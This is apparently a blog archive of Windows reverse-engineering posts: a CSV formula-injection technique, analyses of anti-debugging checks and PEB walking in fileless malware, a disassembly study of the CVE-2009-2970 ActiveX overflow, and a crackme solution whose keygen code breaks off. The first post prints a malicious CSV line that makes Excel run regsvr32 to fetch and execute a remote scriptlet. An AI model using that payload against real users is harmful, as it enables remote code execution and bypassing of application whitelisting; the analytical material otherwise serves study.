Archive for the ‘Windows’ Category
Microsoft Excel CSV code execution/injection method
Yesterday Davo Cossa mentioned this technique in one of his tweets. The idea behind it is to exploit how formulas and CSV parsing is performed by Microsoft Excel in order to achieve remote code execution by tricking the user into opening a specially crafted CSV file. You can see the example malicious CSV below.
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
And here is how it works. When Microsoft Excel tries to parse a CSV file it adds each comma separated field in a separate cell. So, first cell will be “fillerText1”, the second cell “fillerText2”, and so on. However, the last one in this example will try to insert the following to a cell.
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
As you probably already know, Microsoft Excel treats the “=” as a special character to indicate the beginning of a formula. So, here is what the above code will actually try to execute on the target system.
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll
What this does is calling the Microsoft Register Server (regsvr32) in silent mode (/s), unregistering (/u), not calling DLL register server (/n) and passing the required DLL to load via parameter (/i). The passed DLL is “scrobj.dll” which is the Microsoft’s Script Component Runtime and it asks it to fetch and execute the Windows Scriptlet file located at http://RemoteIPAddress/SCTLauncher.sct. Because regsvr32 is part of the Windows operating system it bypasses the AppLocker whitelist and can execute any script from the fetched file on the victim’s system. There is a full analysis of this AppLocker bypass technique here.
The CheckRemoteDebuggerPresent() anti-debugging technique
Disclaimer: I am not an experienced Windows guy. I know just the basics and still learning.
A few days ago I published Reverse Engineering isDebuggerPresent() which is the most widely used anti-debugging method in Windows malware. Here I will be going through another very common anti-debugging method in Windows malware, the CheckRemoteDebuggerPresent() from kernel32.dll.
BOOL WINAPI CheckRemoteDebuggerPresent( _In_ HANDLE hProcess, _Inout_ PBOOL pbDebuggerPresent );
Basically, the function will set “pbDebuggerPresent” to TRUE or FALSE depending on the status of the process referenced by “hProcess” pointer. Malware authors typically use this in a way similar to what you see below. The following code retrieves the current process’ handle via GetCurrentProcess() and then uses CheckRemoteDebuggerPresent() to discover if a debugger is attached to this process.
#include "windows.h" int main(void) { BOOL HasDebugPort = FALSE; if (CheckRemoteDebuggerPresent(GetCurrentProcess(), &HasDebugPort)) { ExitProcess(0); // Running in ring-3 debugger } // Running outside ring-3 debugger return 0; }
If you recall, what isDebuggerPresent() does, is returning the value of “Process->PEB->BeingDebugged”. CheckRemoteDebuggerPresent() is slightly different. Instead of looking for this flag, it checks if the process has a non-zero debug port. In other words, this means that the process has a Ring-3 debugger attached to it. Below you can see how CheckRemoteDebuggerPresent() actually works in KernelBase.dll.
Unlike isDebuggerPresent(), the CheckRemoteDebuggerPresent() uses NtQueryInformationProcess() to obtain the value of “Process->ProcessDebugPort” value. Below you can see some example/pseudo code on how NtQueryInformationProcess() retrieves that information.
NTSTATUS NTAPI NtQueryInformationProcess(IN HANDLE ProcessHandle, IN PROCESSINFOCLASS ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength OPTIONAL) { ... Status = ObReferenceObjectByHandle(ProcessHandle, PROCESS_QUERY_INFORMATION, PsProcessType, PreviousMode, (PVOID*)&Process, NULL); ... *(PHANDLE)ProcessInformation = (Process->DebugPort ? (HANDLE)-1 : NULL); ... }
To defeat this anti-debugging technique we can use similar methods like the ones we described for isDebuggerPresent(). Namely, here are a few example methods to do this:
- Patch the comparison of the return value of CheckRemoteDebuggerPresent() in the malware code
- Patch the malware to jump over the CheckRemoteDebuggerPresent() check
- Patch the malware to NOP the CheckRemoteDebuggerPresent() check
- Set a breakpoint after the NtQueryInformationProcess() call and update its return value for ProcessDebugPort to 0
- Pre-load/hook a DLL that overrides NtQueryInformationProcess() and always returns 0 for ProcessDebugPort
Fileless malware and PEB enumeration
I was reverse engineering a fileless (meaning the malicious payload is only in the system’s memory) malware sample and I came across this technique which apparently is quite popular in fileless malware. So, this is what this post will be about. How fileless malware take advantage of PEB (Process Environment Block) enumeration to work. You can see the PEB structure as defined in Winternl.h header file below.
typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[1]; PVOID Reserved3[2]; PPEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; BYTE Reserved4[104]; PVOID Reserved5[52]; PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; BYTE Reserved6[128]; PVOID Reserved7[1]; ULONG SessionId; } PEB, *PPEB;
When a malware injects a payload into memory it needs to somehow find which API calls to use. This means it has to find where those are located in memory. A common method to do this is using PEB which is always located at the same offset. Specifically, at offset 0x30 from the “fs” register. The assembly instructions you see below will load the PEB pointer to the “edx” register.
xor edx, edx ; Make sure edx is empty mov edx, fs:[edx+30h] ; Get the address of PEB
Now that the malware has a starting point, it can get advantage of the “Ldr” pointer which is PEB. “Ldr” is technically a pointer to a “PEB_LDR_DATA” structure which contains a linked list (InMemoryOrderModuleList) of the loaded modules. Here you can see how this is defined in Winternl.h header file.
typedef struct _PEB_LDR_DATA { BYTE Reserved1[8]; PVOID Reserved2[3]; LIST_ENTRY InMemoryOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA;
And below you can see the equivalent assembly instructions that will help us find the “Ldr” pointer. We are just using the PEB pointer that we discovered above and add 0x0C to it which will lead us to the location of the “Ldr” pointer, and we store its value in the “edx” register.
xor edx, edx ; Make sure edx is empty mov edx, fs:[edx+30h] ; Get the address of PEB mov edx, [edx+0Ch] ; Get the address of PEB->Ldr
Within the “Ldr” as you saw from the type definition above, there is a doubly-linked list named “InMemoryOrderModuleList”. This doubly-linked list contains the modules that are loaded in this process. Once again, the “LIST_ENTRY” data type is defined in the Winternl.h header file and you can see it here.
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink; struct _LIST_ENTRY *Blink; }LIST_ENTRY, *PLIST_ENTRY;
The code can now just iterate through the “InMemoryOrderModuleList” linked list to enumerate the loaded modules that are available. You can see the equivalent assembly code below which is similar to the above. However, now “edx” register points to the first module (specifically a pointer to a “LDR_DATA_TABLE_ENTRY” structure) that is available. By increasing the offset we can iterate through all of them.
xor edx, edx ; Make sure edx is empty mov edx, fs:[edx+30h] ; Get the address of PEB mov edx, [edx+0Ch] ; Get the address of PEB->Ldr mov edx, [edx+14h] ; Get the PEB->Ldr->InMemoryOrderModuleList
From this point on, the malware can identify the modules it needs to use and reference them directly. This method is very popular in fileless malware as it can be used to dynamically discover loaded modules when a payload is injected in memory and executed via another process. For example, a common method is to use the third entry of the list (which includes the base address of kernel32.dll) and enumerate the export table of kernel32.dll to find LoadLibrary() and start loading arbitrary DLLs required for its operation. Here is a sample code that gets the base address of kernel32.dll which can be used to discover LoadLibrary() to be able to load modules dynamically.
xor edx, edx ; Make sure edx is empty mov edx, fs:[edx+30h] ; Get the address of PEB mov edx, [edx+0Ch] ; Get the address of PEB->Ldr mov edx, [edx+14h] ; Get the PEB->Ldr->InMemoryOrderModuleList mov edx, [edx] ; Second entry in PEB->Ldr->InMemoryOrderModuleList mov edx, [edx] ; Third entry (kernel32.dll) in PEB->Ldr->InMemoryOrderModuleList mov edx, [edx+10h] ; The base address of the third entry (kernel32.dll)
Reverse Engineering isDebuggerPresent()
Disclaimer: I am not an experienced Windows guy. I know just the basics and still learning.
There have been tons of articles on how to bypass isDebuggerPresent(), the most widely used anti-debugging method in Windows. However, here we will go a little bit into what isDebuggerPresent() does internally. As we can read in Microsoft’s documentation, it comes with a very simple prototype from Kernel32 library.
BOOL WINAPI IsDebuggerPresent(void);
What we need to know is that isDebuggerPresent() is designed to perform just one task. Return a non-zero value if the current process is running in a user-mode debugger, and a zero value if it is not running in a user-mode debugger. If we load up the Kernel32 DLL (Dynamic-Link Library), we can quickly find the export of this routine. Basically, it is just a jump to an internal offset from DS (Data Segment) register.
This makes sense as Microsoft has moved a lot of the functionality from kernel32.dll and advapi32.dll to kernelbase.dll. So, if we load kernelbase.dll we will quickly locate the actual code behind isDebuggerPresent() which consists of a very simple operation.
Literally, the entire isDebuggerPresent() function is three assembly instructions. First, it stores the value of fs:30h register to EAX register, then copies the value of EAX+2 to the EAX register and lastly, it returns the value that EAX has.
mov eax, large fs:30h movzx eax, byte ptr [eax+2] retn
The question now becomes, what does the FS segment register store in offset 0x30? The answer is common to any Windows people out there. In Windows, the FS segment register points to the Win32 TIB (Windows 32-bit Thread Information Block), a data structure that describes the currently running thread. In the 0x30 offset we have the linear address of the Process Environment Block (PEB). If you are interested in the rest of the TIB you can check the full mapping on Wikipedia.
This means that the first instruction retrieves the address of PEB data structure. The second instruction fetches the value that is stored two Bytes after the beginning of the PEB structure. Reading Microsoft’s documentation on PEB solves this mystery as this is where “BeingDebugged” is located. So, technically isDebuggerPresent() is returning whatever value “BeingDebugged” has.
typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[1]; PVOID Reserved3[2]; PPEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; BYTE Reserved4[104]; PVOID Reserved5[52]; PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; BYTE Reserved6[128]; PVOID Reserved7[1]; ULONG SessionId; } PEB, *PPEB;
The question now becomes, what can set _PEB.BeingDebugged to a non-zero value and why. The answer to this is the debugging API of Windows. When a request is made to attach a debugger to a process such as DebugActiveProcess() it will result to a call to DbgUiDebugActiveProcess() from the Windows Native API, known as NTDLL. Here is the equivalent disassembled code.
What we care about as you can easily guess, is the call to _NtDebugActiveProcess() function. This internal API call results in a system call (hex value 0x800C5) to “NtDebugActiveProcess” which is invoked via Wow64SystemServiceCall(). This is part of the NT Operating System kernel (ntoskrnl.exe), also known as the Windows kernel image. If we load the ntoskrnl.exe to IDA and find this system call’s code, we will see exactly how “BeingDebugged” is set.
As you can see “NtDebugActiveProcess” system call will eventually result in the invocation of DbgkpSetProcessDebugObject() function. A function that takes four arguments and is defined as you see below in the Windows internal kernel API prototype.
NTSTATUS NTAPI DbgkpSetProcessDebugObject(IN PEPROCESS Process, IN PDEBUG_OBJECT DebugObject, IN NTSTATUS MsgStatus, IN PETHREAD LastThread )
This routine is also part of ntoskrl.exe and what is interesting to us is at the very bottom of its code. You can see the exact snippet below. What we care about is the call to DbgkpMarkProcessPeb() function.
As it is suggested by its name, DbgkpMarkProcessPeb() will update the PEB of the process that it received as an argument to mark it as under debugging. Below you can see exactly where the “BeingDebugged” flag is set to TRUE (or FALSE) within DbgkpMarkProcessPeb().
The above code updates “Process->PEB->BeingDebugged” based on the value of “DebugPort”. If the “DebugPort” is enabled, it will set “Process->PEB->BeingDebugged” to the value of “DebugPort”, otherwise it will remain unset. The “DebugPort” is a value of the PEB structure which is initialized if the parent process (like a debugger) or the kernel was asked to to associate this process with a debug object. You can see the function that does this below.
Basically, this means that any time a debug object is created on the kernel for a process, the DbgkpMarkProcessPeb() will be invoked to ensure that “BeingDebugged” is set to TRUE in the PEB data structure of this specific process. Then, isDebuggerPresent() will simply fetch that value and return it to the user-space when called. As I mentioned in the intro, the scope of this post was not how to defeat the isDebuggerPresent() anti-debugging technique, but to understand how it works. Knowing the above should be sufficient to give you some ideas on how to do it. Just for reference, below are some ideas with a few different methods to bypass this check.
- NOP the call to isDebuggerPresent() (source: StackOverflow)
- Modify the PEB.BeingDebugged value (source: aldeid)
- Update the value of EAX+2 to 0 (FALSE) before the check
- Update the value of FS:30h (3rd Byte) to 0 (FALSE)
CVE-2009-2970: UiTV UiPlayer ActiveX Stack Overflow
This bug was discovered and reported by Yu Yang of NSFOCUS Security Team. As the author state in the advisory, this issue affects UiCheck.dll releases prior to 1.0.0.7. So, I used 1.0.0.6 version of that DLL and let’s see what I’ve found…
.text:10002390 .text:10002390 ; int __stdcall sub_10002390(int, LPCWSTR lpWideCharStr, int) .text:10002390 sub_10002390 proc near ; DATA XREF: .rdata:1001391C^Yo .text:10002390 ; .rdata:10013F24^Yo .text:10002390 .text:10002390 var_4A8 = byte ptr -4A8h .text:10002390 CodePage = dword ptr -4A4h .text:10002390 puLen = dword ptr -4A0h .text:10002390 lpBuffer = dword ptr -49Ch .text:10002390 var_498 = dword ptr -498h .text:10002390 dwHandle = dword ptr -494h .text:10002390 SubBlock = byte ptr -490h .text:10002390 SubKey = byte ptr -390h .text:10002390 ValueName = byte ptr -290h .text:10002390 var_194 = byte ptr -194h .text:10002390 var_190 = byte ptr -190h .text:10002390 var_11B = byte ptr -11Bh .text:10002390 Data = byte ptr -110h .text:10002390 Str = byte ptr -0Ch .text:10002390 var_4 = dword ptr -4 .text:10002390 lpWideCharStr = dword ptr 0Ch .text:10002390 arg_8 = dword ptr 10h .text:10002390
This is the buggy handling routine and here is how it starts it code…
.text:10002390 push ebp .text:10002391 lea ebp, [esp-428h] .text:10002398 sub esp, 4A8h .text:1000239E mov eax, dword_10017360 .text:100023A3 push ebx .text:100023A4 push esi .text:100023A5 push edi .text:100023A6 mov [ebp+428h+var_4], eax .text:100023AC call Target .text:100023B2 mov ebx, [ebp+428h+lpWideCharStr] .text:100023B8 mov [ebp+428h+CodePage], eax .text:100023BB xor eax, eax .text:100023BD cmp ebx, eax .text:100023BF mov [ebp+428h+dwHandle], eax .text:100023C2 jz short loc_10002404
First of all, EBP is loaded with ‘[esp-428h]’ and stack pointer is set accordingly. Then EAX register is initialized with ‘dword_10017360’ which is later moved to ‘[ebp+428h+var_4]’ as the fourth argument of ‘Target’ callback function. When this returns, EBX is initialized with ‘lpWideCharStr’ and the returned value of the callback function is used to set the ‘CodePage’ value. EAX register is zeroed out using a simple XOR logical operation and the result compared. Then, it initializes ‘dwHandle’ to the value of EAX and if it’s zero, it will perform a short jump to ‘loc_10002404’ which will initialize EDX and EBX like this:
.text:10002404 .text:10002404 loc_10002404: ; CODE XREF: sub_10002390+32^Xj .text:10002404 ; sub_10002390+70^Xj .text:10002404 lea edx, [ebp+428h+ValueName] .text:1000240A lea ebx, [ebx+0]
Assuming that this is not the case, the following will be executed:
.text:100023C4 push ebx ; lpString .text:100023C5 call ds:lstrlenW .text:100023CB lea edi, [eax+eax+2] .text:100023CF mov eax, edi .text:100023D1 add eax, 3 .text:100023D4 and eax, 0FFFFFFFCh .text:100023D7 call __alloca_probe
This code performs a call to Unicode lstrlenW() routine passing EBX (that contains lpString) to it as an argument. It loads ‘[eax+eax+2]’ to EDI register and then moves that value back to EAX and adds 3 to it. Finally, it performs a logical AND mask with 0x0FFFFFFF to avoid negative numbers and calls __alloca_probe() to ensure that there is enough space in the stack for allocation.
Let’s continue…
.text:100023DC mov esi, esp .text:100023DE test esi, esi .text:100023E0 jz short loc_10002402
So, ESI is initialized with ESP’s value and if the test check returns zero, it will jump to ‘loc_10002402’ which is a simple code that zeroes EAX out like this:
.text:10002402 .text:10002402 loc_10002402: ; CODE XREF: sub_10002390+50^Xj .text:10002402 xor eax, eax
However, if this is not the case. Which means that we have enough space on the stack, a call to WideCharToMultiByte() will be performed like this:
.text:100023E2 mov eax, [ebp+428h+CodePage] .text:100023E5 push 0 ; lpUsedDefaultChar .text:100023E7 push 0 ; lpDefaultChar .text:100023E9 push edi ; cchMultiByte .text:100023EA push esi ; lpMultiByteStr .text:100023EB push 0FFFFFFFFh ; cchWideChar .text:100023ED push ebx ; lpWideCharStr .text:100023EE push 0 ; dwFlags .text:100023F0 push eax ; CodePage .text:100023F1 mov byte ptr [esi], 0 .text:100023F4 call ds:WideCharToMultiByte .text:100023FA neg eax .text:100023FC sbb eax, eax .text:100023FE and eax, esi .text:10002400 jmp short loc_10002404 .text:10002402 ; ---------------------------------------------------------------------------
The returned value (stored in EAX) is checked for overflow using NEG instruction. The subsequent call to SBB will subtract (with cartage) the EAX register and then perform a logical AND to it using ESI register. The short jump to ‘loc_10002404’ was described earlier, it will just execute this:
.text:10002404 loc_10002404: ; CODE XREF: sub_10002390+32^Xj .text:10002404 ; sub_10002390+70^Xj .text:10002404 lea edx, [ebp+428h+ValueName] .text:1000240A lea ebx, [ebx+0] .text:10002410
And here is the code you’ve been waiting for…
.text:10002410 loc_10002410: ; CODE XREF: sub_10002390+88^Yj .text:10002410 mov cl, [eax] .text:10002412 inc eax .text:10002413 mov [edx], cl .text:10002415 inc edx .text:10002416 test cl, cl .text:10002418 jnz short loc_10002410
This is a simple loop that will continue copying ‘[eax]’ to ‘cl’ and ‘cl’ to the location of EDX as long as ‘cl’ is not NULL. This looks like a simple loop similar to the following (in C pseudo-code):
char *edx = ValueName; char *ebx = lpWideCharStr; *(char *)ebx = 0; // As it did in loc_10002404 while ( *ebx != NULL) { *(char *)edx = *(char *)ebx; *ebx++; *edx++; }
So, it will continue copying regardless of the destination buffer’s size. However, ‘ValueName’ has static size as you can read from the stack frame (or the offsets generated by IDA in the above paste). The code that follows is of no interest. It performs some GetModuleHandleA(), GetModuleFileNameA(), GetFileVersionInfoSizeA() etc. calls. In 1.0.0.7 DLL version, this code was changed like this:
.text:10002415 loc_10002415: ; CODE XREF: sub_10002390+81^Xj .text:10002415 push 32h ; Count .text:10002417 push eax ; Source .text:10002418 lea ecx, [ebp+428h+ValueName] .text:1000241E push ecx ; Dest .text:1000241F call _strncpy .text:10002424 add esp, 0Ch .text:10002427 push offset aUicheck_dll ; "UiCheck.dll" .text:1000242C call ds:GetModuleHandleA
As you can read, instead of using that simple copy loop that they did, they use _strncpy() in a manner similar to:
_strncpy(ValueName, lpWideCharStr, 0x32);
Quite simple bug and if you spend some time on that DLL you’ll see that it has a few more vulnerabilities. Anyway, this post was a result of my first attempt to use N. Economou’s TurboDiff which is really awesome plugin for IDA. :)
cyclops’s NTS-Crackme10 Solution
I found my solution for this crackme while cleaning up an old USB flash drive. So, here is my solution to this really cool crackme.
When you first run you’ll see something similar to this:
After browsing for a few minutes the code in IDA I spotted the reason why it was exiting when I was attempting to run it in a debugger. The reason is:
.text:0040129C loc_40129C: ; CODE XREF: sub_401260+36j .text:0040129C push offset LibFileName ; "kernel32.dll" .text:004012A1 call ds:LoadLibraryA .text:004012A7 push offset ProcName ; "IsDebuggerPresent" .text:004012AC push eax ; hModule .text:004012AD call ds:GetProcAddress .text:004012B3 call eax .text:004012B5 test eax, eax .text:004012B7 jz short loc_4012BD .text:004012B9 push 0 ; nExitCode .text:004012BB call edi ; PostQuitMessage .text:004012BD
As you can see, it uses IsDebuggerPresent() from kernel32.dll and if this returns TRUE which means EAX will be non-zero, it will jump to loc_4012BD. Otherwise, it will just execute PostQuitMessage(0). There a number of ways to overcome this protection, the simplest one is to just patch the binary and make “test” instruction succeed every time. Another common way is to attach to the process after this code has been executed. In this case, attaching is easier since this check is performed only once during the initialization of the process. Just start the process normally in your Windows and then attach your favorite debugger to it! :)
And now, it is the time to fill every “sound interesting” function with breakpoints. Probably the most interesting one was the Cwnd::GetDlgItemTextA(int, char *, int). From MSDN we can see that this is an MFC (Microsoft Foundation Class) library routine, this is definitely not surprising. Just have a look at that binary and you will see that it makes wide use of MFC. So… After entering a username/password like AAAAAAAA/BBBBBBBB and pressing a quite a few F7 I saw this:
.text:004014BA loc_4014BA: ; CODE XREF: sub_401490+21j .text:004014BA nop .text:004014BB pop eax .text:004014BC lea eax, [ebp+var_24] .text:004014BF push 1Fh .text:004014C1 push eax .text:004014C2 push 3E8h .text:004014C7 call ?GetDlgItemTextA@CWnd@@QBEHHPADH@Z ; CWnd::GetDlgItemTextA(int,char *,int) .text:004014CC mov edi, eax .text:004014CE push ecx .text:004014CF push eax .text:004014D0 rdtsc .text:004014D2 xor ecx, ecx .text:004014D4 add ecx, eax .text:004014D6 rdtsc .text:004014D8 sub eax, ecx .text:004014DA cmp eax, 0FFFh .text:004014DF jb short loc_4014E8 .text:004014E1 add [ebp+var_4], 3025h .text:004014E8
The value stored in EAX, is our username as we can see from the stack at that moment:
Stack[00000488]:0012F884 var_24 db 41h Stack[00000488]:0012F885 db 41h ; A Stack[00000488]:0012F886 db 41h ; A Stack[00000488]:0012F887 db 41h ; A Stack[00000488]:0012F888 db 41h ; A Stack[00000488]:0012F889 db 41h ; A Stack[00000488]:0012F88A db 41h ; A Stack[00000488]:0012F88B db 41h ; A
Then, it invokes Cwnd::GetDlgItemTextA() in a way similar to: GetDlgItemTextA(0x1F, username, 0x03E8). The last value represents the maximum length and in decimal this is 1000. The subsequent mov edi, eax instruction is used to store the return value (EAX) of GetDlgItemTextA() which represents the length of the characters being copied not including the NULL termination to EDI register.
The next snippet makes use of rdtsc to retrieve the processor timestamp and store the result which is 64bit long to ECX and EAX. It zeros out ECX by XOR’ing it with it self and then adds to it the value of EAX (the lower value returned by rdtsc). It invokes rdtsc once again and then substracts the returned value from the one stored in EAX from the first call. If the comparison succeeds, which means that EAX is equal to 0xFFF (which is 4096 in decimal) it skips the add instruction since it jumps to loc_4014E8 which is the immediately next location.
In case that CMP fails, which means that it took some more time than the expected between the two instructions, then it adds 0x3025 (12325 in decimal) to a local variable. This is another nice little anti-debugging feature. It counts the execution time between the two rdtsc instructions and if it is longer than the expected (probably because of some debugger single stepping around) then it changes its behavior. Once again, there are countless ways to bypass this. You can patch it to add 0, you can NOP it, you can make the CMP succeed always, or you can simply set a breakpoint after that code, for example in loc_4014E8 and thus no execution time overhead. I patched it to be zero and now, after bypassing this let’s move to the loc_4014E8 code.
.text:004014E8 loc_4014E8: ; CODE XREF: sub_401490+4Fj .text:004014E8 nop .text:004014E9 pop eax .text:004014EA pop ecx .text:004014EB lea ecx, [ebp+var_48] .text:004014EE push 11h .text:004014F0 push ecx .text:004014F1 push 3E9h .text:004014F6 mov ecx, esi .text:004014F8 call ?GetDlgItemTextA@CWnd@@QBEHHPADH@Z ; CWnd::GetDlgItemTextA(int,char *,int)
Here it just invokes Cwnd::GetDlgItemTextA() in a way similar to: GetDlgItemTextA(17, password, 1001). So… Continuing with this function we have:
.text:004014FD cmp edi, 5 .text:00401500 jle short loc_40152F .text:00401502 cmp eax, 5 .text:00401505 jle short loc_40152F
If you recall, EDI has the length of the username not including the NULL termination and from the previous call, EAX has the length of the password. If any of these two is less than 5 characters, it will jump to loc_40152F. This is something you really don’t want to happen since this code simply ends this function like this:
.text:0040152F loc_40152F: ; CODE XREF: sub_401490+70j .text:0040152F ; sub_401490+75j ... .text:0040152F pop edi .text:00401530 pop esi .text:00401531 mov esp, ebp .text:00401533 pop ebp .text:00401534 retn
Assuming that our credentials are more than 5 characters, then the code that follows is this:
.text:00401507 mov edx, [ebp+var_4] .text:0040150A lea eax, [ebp+var_48] .text:0040150D push edx .text:0040150E lea ecx, [ebp+var_24] .text:00401511 push eax .text:00401512 push ecx .text:00401513 call sub_4013D0 .text:00401518 add esp, 0Ch .text:0040151B test eax, eax .text:0040151D jz short loc_40152F .text:0040151F push 0 .text:00401521 push 0 .text:00401523 push offset aSerialIsCorrec ; "Serial is Correct!!!" .text:00401528 mov ecx, esi .text:0040152A call ?MessageBoxA@CWnd@@QAEHPBD0I@Z ; CWnd::MessageBoxA(char const *,char const *,uint) .text:0040152F
Now, EDX contains the username, EAX the password and then a call to sub_4013D0 is made with parameters like these: sub_4013D0(&username, &password, var_4). It is noteworthy here that if the rdtsc anti-debugging succeeded, then var_4 would be set to 12325 instead of 0 that it is normally. Anyway, keep these in mind and let’s continue with the execution.
After a useless ESP+0, it tests the return value of sub_4013D0 function. If it returns FALSE, then it will jump to loc_40152F which was demonstrated earlier, it will just terminate the routine. However, if it returns true it will call MessageBoxA(“Serial is Correct!!!”, 0, 0). We have reached our goal! We can now choose the easy path of just patching it and creating a crack file that changes the behavior of that test instruction or its equivalent jz or whatever. But the fun part is to reverse the sub_4013D0 and write a nice little key logger. Let’s do this.
It starts like this…
.text:004013D0 sub_4013D0 proc near ; CODE XREF: sub_401490+83p .text:004013D0 .text:004013D0 Dest = byte ptr -0Ch .text:004013D0 arg_0 = dword ptr 4 .text:004013D0 arg_4 = dword ptr 8 .text:004013D0 arg_8 = dword ptr 0Ch .text:004013D0 .text:004013D0 sub esp, 0Ch .text:004013D3 xor eax, eax .text:004013D5 xor edx, edx .text:004013D7 push ebx .text:004013D8 push esi .text:004013D9 mov esi, [esp+14h+arg_0] .text:004013DD mov cl, [esi] .text:004013DF test cl, cl .text:004013E1 jz short loc_401422 .text:004013E3 push edi .text:004013E4 mov edi, [esp+18h+arg_8]
So, we have our three arguments username, password and that anti-debugging counter. Then it allocates 12 bytes on the stack and zeroes out EAX and EDX. For convenience I renamed the argumets to user, pass and counter respectively. The next mov instruction stores the address of the username to ESI and the following one, uses the lower part of ECX (meaning the CL register) to get the first character of the username. If this is not NULL (meaning that test instruction succeeds), it will jump to loc_401422. Otherwise, it will push the current value of EDI in the stack and then store the anti-debugging counter to it. Assuming that our username has at least 6 characters, to pass a check shown earlier we can move on with the execution knowing that the test instruction will succeed. The following code is this:
.text:004013E8 loc_4013E8: ; CODE XREF: sub_4013D0+4Fj .text:004013E8 movsx ecx, cl .text:004013EB mov ebx, ecx .text:004013ED xor ebx, 0C0C0C0C0h .text:004013F3 sub ebx, edi .text:004013F5 add ebx, edx .text:004013F7 imul ebx, eax .text:004013FA shl ebx, 1 .text:004013FC mov edx, ebx .text:004013FE lea ebx, [ecx+ecx*4] .text:00401401 xor edx, ebx .text:00401403 and ecx, 8000001Fh .text:00401409 jns short loc_401410 .text:0040140B dec ecx .text:0040140C or ecx, 0FFFFFFE0h .text:0040140F inc ecx
Ok… It moves the character of the username stored in CL to ECX in order to be able to perform various operations. For this reason it uses movsx that performs sign extension. It then moves it into ECX and XORs it with 0x0C0C0C0C0. It then subtracts from it the anti-debugging counter/value which is 0 if everything works as expected and increments EBX (username pointer) by EDX (which is 0 now). The next three instructions, imul, shl and mov are used to multiply and sign extend EAX (which is 0) with EBX (username character) and store the result to EDX. The next lea instruction is tricky, it’s used simply to multiply by five and store that result to EBX. The previous result stored in EDX and the one of the exact previous instruction in EBX are XOR’d. Next, ECX is masked with 0x8000001F and if the value isn’t less than zero, then jump to loc_401410. If this is not the case, decrement ECX and OR it with 0x0FFFFFFE0 and then increment it. Assuming that we have a positive value, the following code will be executed:
.text:00401410 loc_401410: ; CODE XREF: sub_4013D0+39j .text:00401410 shl edx, cl .text:00401412 mov cl, [eax+esi+1] .text:00401416 xor edx, 0BADDC001h .text:0040141C inc eax .text:0040141D test cl, cl .text:0040141F jnz short loc_4013E8 .text:00401421 pop edi
The first instruction shifts left EDX register, and the next mov instruction retrives the next character of the username. EDX is then XOR’d with 0x0BADDC001 and EAX is incremented. If CL is not NULL it jumps back to loc_4013E8. So.. this is a simple loop. In C this could be represent it like:
for(c = *(char *)username; username; ++i) { edx = 5 * c ^ 2 * i * (edx + (c ^ 0xC0C0C0C0) - counter); ecx = c & 0x8000001F; if (ecx < 0) ecx = ((--ecx) | 0xFFFFFFE0) + 1; edx = edx << ecx; c = *(char *) (i + user + 1); edx = edx ^ 0x0BADDC001; } [/sourcecode] With this in mind we can move on with this routine. The next code is fairly simple... [sourcecode language="c"] .text:00401422 loc_401422: ; CODE XREF: sub_4013D0+11j .text:00401422 push edx .text:00401423 lea eax, [esp+18h+Dest] .text:00401427 push offset Format ; "%08X" .text:0040142C push eax ; Dest .text:0040142D call ds:sprintf .text:00401433 mov esi, [esp+20h+pass] .text:00401437 add esp, 0Ch .text:0040143A lea eax, [esp+14h+Dest] [/sourcecode] What it does is basically sprintf(Dest, "%08X", edx). This means that the hex value is then stored into ESI and the final password into EAX. So, in C this code would be: [sourcecode language="c"] sprintf(dest, "%08X", edx); esi = password; eax = dest; [/sourcecode] And let's move to the next disassembled code... [sourcecode language="c"] .text:0040143E loc_40143E: ; CODE XREF: sub_4013D0+90j .text:0040143E mov dl, [eax] .text:00401440 mov bl, [esi] .text:00401442 mov cl, dl .text:00401444 cmp dl, bl .text:00401446 jnz short loc_401473 .text:00401448 test cl, cl .text:0040144A jz short loc_401462 [/sourcecode] It moves the first character of the dest string into DL and the first of the password into BL registers. It then moves DL into CL and compares DL (aka the dest string character) with BL (the password character). If they are not equal it jumps to loc_401473, if they are, it checks that dest character, CL is not NULL. If it's NULL it jumps to loc_401462. The code continues like this: [sourcecode language="c"] .text:0040144C mov dl, [eax+1] .text:0040144F mov bl, [esi+1] .text:00401452 mov cl, dl .text:00401454 cmp dl, bl .text:00401456 jnz short loc_401473 .text:00401458 add eax, 2 .text:0040145B add esi, 2 .text:0040145E test cl, cl .text:00401460 jnz short loc_40143E [/sourcecode] It increments the pointers to point to the next characters and compares them once again. It iterates to this loop until it completes the string, meaning CL is NULL. In C this could be written like: [sourcecode language="c"] dl = *(char *)dest; bl = *(char *)password; for(;;) { cl = dl; if (dl != bl) goto loc_401473; if(cl == NULL) goto loc_401462; dl = *(char *)dest++; bl = *(char *)password++; if (dl != bl) goto loc_401473; dest += 2; password += 2; if (cl == NULL) goto loc_40143E; } [/sourcecode] So.. that's it! By the way, if you single step you can check out the value stored in dest using sprintf. This is the password we're looking for. In my case (user: AAAAAAAA) that was: [sourcecode language="c"] Stack[00000D54]:0012F83C Dest db 37h Stack[00000D54]:0012F83D db 41h ; A Stack[00000D54]:0012F83E db 36h ; 6 Stack[00000D54]:0012F83F db 30h ; 0 Stack[00000D54]:0012F840 db 33h ; 3 Stack[00000D54]:0012F841 db 43h ; C Stack[00000D54]:0012F842 db 35h ; 5 Stack[00000D54]:0012F843 db 42h ; B Stack[00000D54]:0012F844 db 0 [/sourcecode] And of course the result of entering this is... <img src="https://xorl.files.wordpress.com/2009/07/2.jpg" alt="crackme2" title="crackme2" width="336" height="258" class="aligncenter size-full wp-image-1015" /> And obviously, with the above knowledge you can easily write a key generator for this application. Here is mine: #include <stdio.h> #include <string.h> #include <stdlib.h> void usage(const char *); int main(int argc, char *argv[]) { if (argc != 2) 